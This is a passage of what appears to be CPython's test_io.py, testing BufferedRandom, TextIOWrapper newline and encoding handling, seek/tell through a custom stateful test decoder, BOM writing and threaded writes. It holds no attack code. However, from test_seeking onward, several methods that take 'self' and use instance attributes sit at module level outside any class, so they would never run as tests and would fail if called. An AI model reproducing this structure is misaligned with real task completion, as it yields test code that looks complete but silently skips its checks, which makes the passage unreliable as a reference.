    def test_interleaved_read_write(self):
        # Test for issue #12213
        with self.BytesIO(b'abcdefgh') as raw:
            with self.tp(raw, 100) as f:
                f.write(b"1")
                self.assertEqual(f.read(1), b'b')
                f.write(b'2')
                self.assertEqual(f.read1(1), b'd')
                f.write(b'3')
                buf = bytearray(1)
                f.readinto(buf)
                self.assertEqual(buf, b'f')
                f.write(b'4')
                self.assertEqual(f.peek(1), b'h')
                f.flush()
                self.assertEqual(raw.getvalue(), b'1b2d3f4h')
        with self.BytesIO(b'abc') as raw:
            with self.tp(raw, 100) as f:
                self.assertEqual(f.read(1), b'a')
                f.write(b"2")
                self.assertEqual(f.read(1), b'c')
                f.flush()
                self.assertEqual(raw.getvalue(), b'a2c')
    def test_interleaved_readline_write(self):
        with self.BytesIO(b'ab\ncdef\ng\n') as raw:
            with self.tp(raw) as f:
                f.write(b'1')
                self.assertEqual(f.readline(), b'b\n')
                f.write(b'2')
                self.assertEqual(f.readline(), b'def\n')
                f.write(b'3')
                self.assertEqual(f.readline(), b'\n')
                f.flush()
                self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
class CBufferedRandomTest(CBufferedReaderTest, CBufferedWriterTest,
                          BufferedRandomTest, SizeofTest):
    """Run the combined random-access suite against the C implementation."""
    tp = io.BufferedRandom
    def test_constructor(self):
        BufferedRandomTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2GB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                bufio.__init__, rawio, sys.maxsize)
    def test_garbage_collection(self):
        CBufferedReaderTest.test_garbage_collection(self)
        CBufferedWriterTest.test_garbage_collection(self)
    def test_args_error(self):
        # Issue #17275
        with self.assertRaisesRegexp(TypeError, "BufferedRandom"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
    # Run the BufferedRandomTest suite against the pure-Python implementation.
    tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
    """
    A stateful, buffering decoder used to exercise TextIOWrapper seek/tell.

    The input is a stream of words.  A word is either fixed-length (its
    length given by the current input length I) or, when I == 0,
    variable-length and terminated by a period (extra periods are ignored).
    Recognized words:
      - 'i' followed by digits: set the input length I (at most 99).
        Setting I to 0 switches to period-terminated words.
      - 'o' followed by digits: set the output length O (at most 99).
      - anything else: emitted followed by a period, truncated or padded
        with hyphens to length O (emitted verbatim when O is 0).
    Both I and O start at 1.  EOF flushes any buffered input as a final
    word.
    """
    # Toggled by tests that want codecs.lookup('test_decoder') to succeed.
    codecEnabled = False
    def __init__(self, errors='strict'):
        codecs.IncrementalDecoder.__init__(self, errors)
        self.reset()
    def __repr__(self):
        return '<SID %x>' % id(self)
    def reset(self):
        # Restore default lengths and drop any partially buffered word.
        self.i = 1
        self.o = 1
        self.buffer = bytearray()
    def getstate(self):
        # XOR with 1 so that a freshly reset decoder reports flags == 0.
        packed = (self.i ^ 1) * 100 + (self.o ^ 1)
        return bytes(self.buffer), packed
    def setstate(self, state):
        pending, packed = state
        self.buffer = bytearray(pending)
        high, low = divmod(packed, 100)
        self.i = high ^ 1
        self.o = low ^ 1
    def decode(self, input, final=False):
        output = ''
        for b in input:
            if self.i != 0:
                # Fixed-length mode: a word completes after exactly I bytes.
                self.buffer.append(b)
                if len(self.buffer) == self.i:
                    output += self.process_word()
            elif b != '.':
                self.buffer.append(b)
            elif self.buffer:
                # Variable-length mode: a period ends the word; periods with
                # nothing buffered are ignored.
                output += self.process_word()
        if final and self.buffer:
            # EOF flushes the last, possibly short, word.
            output += self.process_word()
        return output
    def process_word(self):
        # Consume the buffered word and return whatever text it decodes to
        # ('' for the control words that only update I or O).
        output = ''
        first = self.buffer[0]
        if first == ord('i'):
            self.i = min(99, int(self.buffer[1:] or 0)) # set input length
        elif first == ord('o'):
            self.o = min(99, int(self.buffer[1:] or 0)) # set output length
        else:
            output = self.buffer.decode('ascii')
            if len(output) < self.o:
                output += '-'*self.o # pad out with hyphens
            if self.o:
                output = output[:self.o] # truncate to output length
            output += '.'
        self.buffer = bytearray()
        return output
    @classmethod
    def lookupTestDecoder(cls, name):
        # codecs.register() hook: answers only for 'test_decoder', and only
        # while a test has enabled it; otherwise defers (returns None).
        if not (cls.codecEnabled and name == 'test_decoder'):
            return None
        latin1 = codecs.lookup('latin-1')
        return codecs.CodecInfo(
            name='test_decoder', encode=latin1.encode, decode=None,
            incrementalencoder=None,
            streamreader=None, streamwriter=None,
            incrementaldecoder=cls)
# Register the decoder factory above with the codecs machinery.  The hook
# stays dormant (codecEnabled is False, so lookups fall through) until a
# test flips StatefulIncrementalDecoder.codecEnabled on.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
    """
    Make sure the StatefulIncrementalDecoder actually works.
    """
    # Each entry is (input bytes, final flag, expected decoded output).
    test_cases = [
        # I=1, O=1 (fixed-length input == fixed-length output)
        (b'abcd', False, 'a.b.c.d.'),
        # I=0, O=0 (variable-length input, variable-length output)
        (b'oiabcd', True, 'abcd.'),
        # I=0, O=0 (should ignore extra periods)
        (b'oi...abcd...', True, 'abcd.'),
        # I=0, O=6 (variable-length input, fixed-length output)
        (b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
        # I=2, O=6 (fixed-length input < fixed-length output)
        (b'i.i2.o6xyz', True, 'xy----.z-----.'),
        # I=6, O=3 (fixed-length input > fixed-length output)
        (b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
        # I=0, then 3; O=29, then 15 (with longer output)
        (b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
            'a----------------------------.' +
            'b----------------------------.' +
            'cde--------------------------.' +
            'abcdefghijabcde.' +
            'a.b------------.' +
            '.c.------------.' +
            'd.e------------.' +
            'k--------------.' +
            'l--------------.' +
            'm--------------.')
    ]
    def test_decoder(self):
        # Try a few one-shot test cases.
        for input, eof, output in self.test_cases:
            d = StatefulIncrementalDecoder()
            self.assertEqual(d.decode(input, eof), output)
        # Also test an unfinished decode, followed by forcing EOF.
        d = StatefulIncrementalDecoder()
        self.assertEqual(d.decode(b'oiabcd'), '')
        self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
    def setUp(self):
        # Raw data mixing \r\n, \r and \n line endings, plus its
        # universal-newline-translated (text) form.
        self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
        self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
        support.unlink(support.TESTFN)
    def tearDown(self):
        # Remove the scratch file, whether or not the test created it.
        support.unlink(support.TESTFN)
    def test_constructor(self):
        # __init__ may be called again to re-configure encoding/newline;
        # bogus newline arguments must be rejected.
        r = self.BytesIO(b"\xc3\xa9\n\n")
        b = self.BufferedReader(r, 1000)
        t = self.TextIOWrapper(b)
        t.__init__(b, encoding="latin1", newline="\r\n")
        self.assertEqual(t.encoding, "latin1")
        self.assertEqual(t.line_buffering, False)
        t.__init__(b, encoding="utf8", line_buffering=True)
        self.assertEqual(t.encoding, "utf8")
        self.assertEqual(t.line_buffering, True)
        self.assertEqual("\xe9\n", t.readline())
        self.assertRaises(TypeError, t.__init__, b, newline=42)
        self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
    def test_uninitialized(self):
        # An object created via __new__ (no __init__) must fail cleanly and
        # become usable once __init__ finally runs.
        t = self.TextIOWrapper.__new__(self.TextIOWrapper)
        del t
        t = self.TextIOWrapper.__new__(self.TextIOWrapper)
        self.assertRaises(Exception, repr, t)
        self.assertRaisesRegexp((ValueError, AttributeError),
                                'uninitialized|has no attribute',
                                t.read, 0)
        t.__init__(self.MockRawIO())
        self.assertEqual(t.read(0), u'')
    def test_non_text_encoding_codecs_are_rejected(self):
        # Ensure the constructor complains if passed a codec that isn't
        # marked as a text encoding
        # http://bugs.python.org/issue20404
        r = self.BytesIO()
        b = self.BufferedWriter(r)
        # Under py3k warnings this is only a warning in 2.7, not an error.
        with support.check_py3k_warnings():
            self.TextIOWrapper(b, encoding="hex_codec")
    def test_detach(self):
        # detach() flushes pending text, returns the buffer, and leaves the
        # wrapper unusable for I/O (but attribute access still works).
        r = self.BytesIO()
        b = self.BufferedWriter(r)
        t = self.TextIOWrapper(b)
        self.assertIs(t.detach(), b)
        t = self.TextIOWrapper(b, encoding="ascii")
        t.write("howdy")
        self.assertFalse(r.getvalue())
        t.detach()
        self.assertEqual(r.getvalue(), b"howdy")
        self.assertRaises(ValueError, t.detach)
        # Operations independent of the detached stream should still work
        repr(t)
        self.assertEqual(t.encoding, "ascii")
        self.assertEqual(t.errors, "strict")
        self.assertFalse(t.line_buffering)
    def test_repr(self):
        # repr() includes the underlying stream's name when it has one, and
        # must not raise even after the buffer has been detached.
        raw = self.BytesIO("hello".encode("utf-8"))
        b = self.BufferedReader(raw)
        t = self.TextIOWrapper(b, encoding="utf-8")
        modname = self.TextIOWrapper.__module__
        self.assertEqual(repr(t),
                         "<%s.TextIOWrapper encoding='utf-8'>" % modname)
        raw.name = "dummy"
        self.assertEqual(repr(t),
                         "<%s.TextIOWrapper name=u'dummy' encoding='utf-8'>" % modname)
        raw.name = b"dummy"
        self.assertEqual(repr(t),
                         "<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
        t.buffer.detach()
        repr(t) # Should not raise an exception
    def test_line_buffering(self):
        # With line_buffering=True, a flush happens whenever a write contains
        # '\n' or '\r' — not on every write.
        r = self.BytesIO()
        b = self.BufferedWriter(r, 1000)
        t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
        t.write("X")
        self.assertEqual(r.getvalue(), b"")  # No flush happened
        t.write("Y\nZ")
        self.assertEqual(r.getvalue(), b"XY\nZ")  # All got flushed
        t.write("A\rB")
        self.assertEqual(r.getvalue(), b"XY\nZA\rB")
    def test_encoding(self):
        # Check the encoding attribute is always set, and valid
        b = self.BytesIO()
        t = self.TextIOWrapper(b, encoding="utf8")
        self.assertEqual(t.encoding, "utf8")
        t = self.TextIOWrapper(b)
        self.assertIsNotNone(t.encoding)
        # The default encoding must at least be resolvable by codecs.
        codecs.lookup(t.encoding)
    def test_encoding_errors_reading(self):
        # Decode errors on read: default and 'strict' raise, 'ignore' drops
        # the bad byte, 'replace' substitutes U+FFFD.
        # (1) default
        b = self.BytesIO(b"abc\n\xff\n")
        t = self.TextIOWrapper(b, encoding="ascii")
        self.assertRaises(UnicodeError, t.read)
        # (2) explicit strict
        b = self.BytesIO(b"abc\n\xff\n")
        t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
        self.assertRaises(UnicodeError, t.read)
        # (3) ignore
        b = self.BytesIO(b"abc\n\xff\n")
        t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
        self.assertEqual(t.read(), "abc\n\n")
        # (4) replace
        b = self.BytesIO(b"abc\n\xff\n")
        t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
        self.assertEqual(t.read(), "abc\n\ufffd\n")
    def test_encoding_errors_writing(self):
        # Encode errors on write: default and 'strict' raise, 'ignore' drops
        # the unencodable character, 'replace' writes '?'.
        # (1) default
        b = self.BytesIO()
        t = self.TextIOWrapper(b, encoding="ascii")
        self.assertRaises(UnicodeError, t.write, "\xff")
        # (2) explicit strict
        b = self.BytesIO()
        t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
        self.assertRaises(UnicodeError, t.write, "\xff")
        # (3) ignore
        b = self.BytesIO()
        t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
                               newline="\n")
        t.write("abc\xffdef\n")
        t.flush()
        self.assertEqual(b.getvalue(), b"abcdef\n")
        # (4) replace
        b = self.BytesIO()
        t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
                               newline="\n")
        t.write("abc\xffdef\n")
        t.flush()
        self.assertEqual(b.getvalue(), b"abc?def\n")
    def test_newlines(self):
        # Newline translation on input across many encodings, buffer sizes
        # and both read(2)+readline and plain iteration access patterns.
        input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
        # (newline argument, expected decoded lines)
        tests = [
            [ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
            [ '', input_lines ],
            [ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
            [ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
            [ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
        ]
        encodings = (
            'utf-8', 'latin-1',
            'utf-16', 'utf-16-le', 'utf-16-be',
            'utf-32', 'utf-32-le', 'utf-32-be',
        )
        # Try a range of buffer sizes to test the case where \r is the last
        # character in TextIOWrapper._pending_line.
        for encoding in encodings:
            # XXX: str.encode() should return bytes
            data = bytes(''.join(input_lines).encode(encoding))
            for do_reads in (False, True):
                for bufsize in range(1, 10):
                    for newline, exp_lines in tests:
                        bufio = self.BufferedReader(self.BytesIO(data), bufsize)
                        textio = self.TextIOWrapper(bufio, newline=newline,
                                                  encoding=encoding)
                        if do_reads:
                            got_lines = []
                            while True:
                                c2 = textio.read(2)
                                if c2 == '':
                                    break
                                self.assertEqual(len(c2), 2)
                                got_lines.append(c2 + textio.readline())
                        else:
                            got_lines = list(textio)
                        for got_line, exp_line in zip(got_lines, exp_lines):
                            self.assertEqual(got_line, exp_line)
                        self.assertEqual(len(got_lines), len(exp_lines))
    def test_newlines_input(self):
        # readlines()/read() must agree for every newline mode, including
        # data containing NUL bytes.
        testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
        normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
        for newline, expected in [
            (None, normalized.decode("ascii").splitlines(True)),
            ("", testdata.decode("ascii").splitlines(True)),
            ("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
            ("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
            ("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
            ]:
            buf = self.BytesIO(testdata)
            txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
            self.assertEqual(txt.readlines(), expected)
            txt.seek(0)
            self.assertEqual(txt.read(), "".join(expected))
    def test_newlines_output(self):
        # Newline translation on output: only '\n' is translated; literal
        # '\r' passes through untouched.
        testdict = {
            "": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
            "\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
            "\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
            "\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
            }
        # newline=None must behave like the platform's os.linesep.
        tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
        for newline, expected in tests:
            buf = self.BytesIO()
            txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
            txt.write("AAA\nB")
            txt.write("BB\nCCC\n")
            txt.write("X\rY\r\nZ")
            txt.flush()
            self.assertEqual(buf.closed, False)
            self.assertEqual(buf.getvalue(), expected)
    def test_destructor(self):
        # Finalizing the wrapper must flush pending text and close the
        # underlying buffer (captured via the close() override).
        l = []
        base = self.BytesIO
        class MyBytesIO(base):
            def close(self):
                l.append(self.getvalue())
                base.close(self)
        b = MyBytesIO()
        t = self.TextIOWrapper(b, encoding="ascii")
        t.write("abc")
        del t
        support.gc_collect()
        self.assertEqual([b"abc"], l)
    def test_override_destructor(self):
        # An overridden __del__ must run, and finalization must still call
        # the (overridden) close(), which in turn triggers flush().
        record = []
        class MyTextIO(self.TextIOWrapper):
            def __del__(self):
                record.append(1)
                try:
                    # The base class may or may not define __del__.
                    f = super(MyTextIO, self).__del__
                except AttributeError:
                    pass
                else:
                    f()
            def close(self):
                record.append(2)
                super(MyTextIO, self).close()
            def flush(self):
                record.append(3)
                super(MyTextIO, self).flush()
        b = self.BytesIO()
        t = MyTextIO(b, encoding="ascii")
        del t
        support.gc_collect()
        self.assertEqual(record, [1, 2, 3])
    def test_error_through_destructor(self):
        # Test that the exception state is not modified by a destructor,
        # even if close() fails.
        rawio = self.CloseFailureIO()
        def f():
            self.TextIOWrapper(rawio).xyzzy
        with support.captured_output("stderr") as s:
            self.assertRaises(AttributeError, f)
        s = s.getvalue().strip()
        if s:
            # The destructor *may* have printed an unraisable error, check it
            self.assertEqual(len(s.splitlines()), 1)
            self.assertTrue(s.startswith("Exception IOError: "), s)
            self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
    def test_basic_io(self):
        # Write/read/seek round-trips across several chunk sizes and
        # encodings; multi-byte encodings also run the multi_line_test.
        for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
            for enc in "ascii", "latin1", "utf8" :# , "utf-16-be", "utf-16-le":
                f = self.open(support.TESTFN, "w+", encoding=enc)
                f._CHUNK_SIZE = chunksize
                self.assertEqual(f.write("abc"), 3)
                f.close()
                f = self.open(support.TESTFN, "r+", encoding=enc)
                f._CHUNK_SIZE = chunksize
                self.assertEqual(f.tell(), 0)
                self.assertEqual(f.read(), "abc")
                cookie = f.tell()
                self.assertEqual(f.seek(0), 0)
                self.assertEqual(f.read(None), "abc")
                f.seek(0)
                self.assertEqual(f.read(2), "ab")
                self.assertEqual(f.read(1), "c")
                self.assertEqual(f.read(1), "")
                self.assertEqual(f.read(), "")
                # tell() at EOF must reproduce the cookie captured earlier.
                self.assertEqual(f.tell(), cookie)
                self.assertEqual(f.seek(0), 0)
                self.assertEqual(f.seek(0, 2), cookie)
                self.assertEqual(f.write("def"), 3)
                self.assertEqual(f.seek(cookie), cookie)
                self.assertEqual(f.read(), "def")
                if enc.startswith("utf"):
                    self.multi_line_test(f, enc)
                f.close()
    def multi_line_test(self, f, enc):
        # Helper for test_basic_io: write lines of many lengths built from a
        # multi-byte sample, then verify readline() returns each line at the
        # tell() position recorded while writing.
        f.seek(0)
        f.truncate()
        sample = "s\xff\u0fff\uffff"
        wlines = []
        for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
            chars = []
            for i in range(size):
                chars.append(sample[i % len(sample)])
            line = "".join(chars) + "\n"
            wlines.append((f.tell(), line))
            f.write(line)
        f.seek(0)
        rlines = []
        while True:
            pos = f.tell()
            line = f.readline()
            if not line:
                break
            rlines.append((pos, line))
        self.assertEqual(rlines, wlines)
    def test_telling(self):
        # tell() positions recorded while writing must match those observed
        # while reading; tell() is forbidden during next()-iteration.
        f = self.open(support.TESTFN, "w+", encoding="utf8")
        p0 = f.tell()
        f.write("\xff\n")
        p1 = f.tell()
        f.write("\xff\n")
        p2 = f.tell()
        f.seek(0)
        self.assertEqual(f.tell(), p0)
        self.assertEqual(f.readline(), "\xff\n")
        self.assertEqual(f.tell(), p1)
        self.assertEqual(f.readline(), "\xff\n")
        self.assertEqual(f.tell(), p2)
        f.seek(0)
        for line in f:
            self.assertEqual(line, "\xff\n")
            # tell() cannot be used while the file is being iterated.
            self.assertRaises(IOError, f.tell)
        self.assertEqual(f.tell(), p2)
        f.close()
def test_seeking(self):
    """Read up to just before a multi-byte char that straddles the decoder
    chunk boundary, then verify readline() decodes the straddling char.
    """
    chunk_size = _default_chunk_size()
    prefix_size = chunk_size - 2
    u_prefix = "a" * prefix_size
    prefix = bytes(u_prefix.encode("utf-8"))
    # ASCII prefix: one byte per char, so the lengths must match.
    self.assertEqual(len(u_prefix), len(prefix))
    u_suffix = "\u8888\n"  # 3-byte UTF-8 char crossing the chunk edge
    suffix = bytes(u_suffix.encode("utf-8"))
    line = prefix + suffix
    f = self.open(support.TESTFN, "wb")
    f.write(line*2)
    f.close()
    f = self.open(support.TESTFN, "r", encoding="utf-8")
    s = f.read(prefix_size)
    self.assertEqual(s, prefix.decode("ascii"))
    self.assertEqual(f.tell(), prefix_size)
    self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
    # Regression test for a specific bug
    # A single 3-byte UTF-8 char read through a 2-byte chunk must not
    # break readline()/tell().
    data = b'\xe0\xbf\xbf\n'
    f = self.open(support.TESTFN, "wb")
    f.write(data)
    f.close()
    f = self.open(support.TESTFN, "r", encoding="utf-8")
    f._CHUNK_SIZE  # Just test that it exists
    f._CHUNK_SIZE = 2
    # Neither call may raise; their results are irrelevant here.
    f.readline()
    f.tell()
def test_seek_and_tell(self):
    """Test seek/tell using the StatefulIncrementalDecoder."""
    # Make test faster by doing smaller seeks
    CHUNK_SIZE = 128

    def test_seek_and_tell_with_data(data, min_pos=0):
        """Tell/seek to various points within a data stream and ensure
        that the decoded data returned by read() is consistent."""
        f = self.open(support.TESTFN, 'wb')
        f.write(data)
        f.close()
        f = self.open(support.TESTFN, encoding='test_decoder')
        f._CHUNK_SIZE = CHUNK_SIZE
        decoded = f.read()
        f.close()
        for i in range(min_pos, len(decoded) + 1): # seek positions
            for j in [1, 5, len(decoded) - i]: # read lengths
                f = self.open(support.TESTFN, encoding='test_decoder')
                self.assertEqual(f.read(i), decoded[:i])
                cookie = f.tell()
                self.assertEqual(f.read(j), decoded[i:i + j])
                # Seeking back to the cookie must restore decoder state.
                f.seek(cookie)
                self.assertEqual(f.read(), decoded[i:])
                f.close()

    # Enable the test decoder.
    StatefulIncrementalDecoder.codecEnabled = 1

    # Run the tests.
    try:
        # Try each test case.
        for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
            test_seek_and_tell_with_data(input)

        # Position each test case so that it crosses a chunk boundary.
        for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
            offset = CHUNK_SIZE - len(input)//2
            prefix = b'.'*offset
            # Don't bother seeking into the prefix (takes too long).
            min_pos = offset*2
            test_seek_and_tell_with_data(prefix + input, min_pos)

    # Ensure our test decoder won't interfere with subsequent tests.
    finally:
        StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
    """For BOM-prefixed encodings, the BOM must be emitted exactly once
    even when write() is called multiple times (see issue1753)."""
    payload = "1234567890"
    for encoding in ("utf-16", "utf-16-le", "utf-16-be",
                     "utf-32", "utf-32-le", "utf-32-be"):
        buf = self.BytesIO()
        f = self.TextIOWrapper(buf, encoding=encoding)
        # Check if the BOM is written only once (see issue1753).
        f.write(payload)
        f.write(payload)
        # Reading back twice must give identical results.
        for _ in range(2):
            f.seek(0)
            self.assertEqual(f.read(), payload * 2)
        self.assertEqual(buf.getvalue(), (payload * 2).encode(encoding))
def test_unreadable(self):
    # read() through a wrapper whose buffer reports readable() == False
    # must raise IOError.
    class UnReadable(self.BytesIO):
        def readable(self):
            return False
    txt = self.TextIOWrapper(UnReadable())
    self.assertRaises(IOError, txt.read)
def test_read_one_by_one(self):
    """Single-character reads must still apply universal-newline
    translation ("\r\n" collapses to "\n")."""
    txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
    pieces = []
    ch = txt.read(1)
    while ch:
        pieces.append(ch)
        ch = txt.read(1)
    self.assertEqual("".join(pieces), "AA\nBB")
def test_readlines(self):
    # readlines() takes an optional size hint; None means "no hint",
    # a number stops after the line that pushes the total past it.
    txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
    self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
    txt.seek(0)
    self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
    txt.seek(0)
    self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
    """A "\r\n" pair straddling the 128-char chunk boundary must still be
    translated to a single "\n"."""
    # make sure "\r\n" straddles 128 char boundary.
    txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
    pieces = []
    chunk = txt.read(128)
    while chunk:
        pieces.append(chunk)
        chunk = txt.read(128)
    self.assertEqual("".join(pieces), "A" * 127 + "\nB")
def test_writelines(self):
    """writelines() concatenates its items verbatim (no separators)."""
    buf = self.BytesIO()
    txt = self.TextIOWrapper(buf)
    txt.writelines(['ab', 'cd', 'ef'])
    txt.flush()
    self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
    # writelines() must accept list-like sequences, not only list.
    l = UserList(['ab', 'cd', 'ef'])
    buf = self.BytesIO()
    txt = self.TextIOWrapper(buf)
    txt.writelines(l)
    txt.flush()
    self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
    # Non-text items (ints, None, and bytes on a text stream) must be
    # rejected with TypeError.
    txt = self.TextIOWrapper(self.BytesIO())
    self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
    self.assertRaises(TypeError, txt.writelines, None)
    self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
    """Issue #1395: char-at-a-time reads must reproduce the newline-
    normalized test data exactly."""
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    # read one char at a time
    pieces = []
    ch = txt.read(1)
    while ch:
        pieces.append(ch)
        ch = txt.read(1)
    self.assertEqual("".join(pieces), self.normalized)
def test_issue1395_2(self):
    # Same data, read 4 chars at a time with a deliberately tiny
    # internal chunk size.
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    txt._CHUNK_SIZE = 4
    reads = ""
    while True:
        c = txt.read(4)
        if not c:
            break
        reads += c
    self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
    # Mixing read() and readline() with a tiny chunk size must still
    # reproduce the normalized data.
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    txt._CHUNK_SIZE = 4
    reads = txt.read(4)
    reads += txt.read(4)
    reads += txt.readline()
    reads += txt.readline()
    reads += txt.readline()
    self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
    # Partial read followed by read-to-end with a tiny chunk size.
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    txt._CHUNK_SIZE = 4
    reads = txt.read(4)
    reads += txt.read()
    self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
    # seek()ing away and back to a tell() cookie must restore the exact
    # read position.
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    txt._CHUNK_SIZE = 4
    reads = txt.read(4)  # advance past the first 4 chars
    pos = txt.tell()
    txt.seek(0)
    txt.seek(pos)
    self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
    # TextIOWrapper must delegate seekable() to its underlying buffer.
    buffer = self.BytesIO(self.testdata)
    txt = self.TextIOWrapper(buffer, encoding="ascii")
    self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
    # The BOM is not written again when appending to a non-empty file
    filename = support.TESTFN
    for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
        with self.open(filename, 'w', encoding=charset) as f:
            f.write('aaa')
            pos = f.tell()  # unused here; kept for parity with test_seek_bom
        with self.open(filename, 'rb') as f:
            # First write carries the BOM ('aaa'.encode includes it).
            self.assertEqual(f.read(), 'aaa'.encode(charset))

        with self.open(filename, 'a', encoding=charset) as f:
            f.write('xxx')
        with self.open(filename, 'rb') as f:
            # Appended data must NOT introduce a second BOM.
            self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
    # Same test, but when seeking manually
    filename = support.TESTFN
    for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
        with self.open(filename, 'w', encoding=charset) as f:
            f.write('aaa')
            pos = f.tell()
        with self.open(filename, 'r+', encoding=charset) as f:
            f.seek(pos)
            f.write('zzz')
            # Seeking to 0 and overwriting must not duplicate the BOM.
            f.seek(0)
            f.write('bbb')
        with self.open(filename, 'rb') as f:
            self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
    # .errors reflects the error handler given to open(); default "strict".
    with self.open(support.TESTFN, "w") as f:
        self.assertEqual(f.errors, "strict")
    with self.open(support.TESTFN, "w", errors="replace") as f:
        self.assertEqual(f.errors, "replace")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
    # Issue6750: concurrent writes could duplicate data
    event = threading.Event()
    with self.open(support.TESTFN, "w", buffering=1) as f:
        def run(n):
            text = "Thread%03d\n" % n
            event.wait()  # release all writers at once to force contention
            f.write(text)
        threads = [threading.Thread(target=run, args=(x,))
                   for x in range(20)]
        with support.start_threads(threads, event.set):
            time.sleep(0.02)
    with self.open(support.TESTFN) as f:
        content = f.read()
        for n in range(20):
            # Each thread's line must appear exactly once (no duplicates,
            # no losses).
            self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
    # Test that text file is closed despite failed flush
    # and that flush() is called before file closed.
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    closed = []
    def bad_flush():
        # Record closed-ness at flush time, then fail.
        closed[:] = [txt.closed, txt.buffer.closed]
        raise IOError()
    txt.flush = bad_flush
    self.assertRaises(IOError, txt.close) # exception not swallowed
    self.assertTrue(txt.closed)
    self.assertTrue(txt.buffer.closed)
    self.assertTrue(closed) # flush() called
    self.assertFalse(closed[0]) # flush() called before file closed
    self.assertFalse(closed[1])
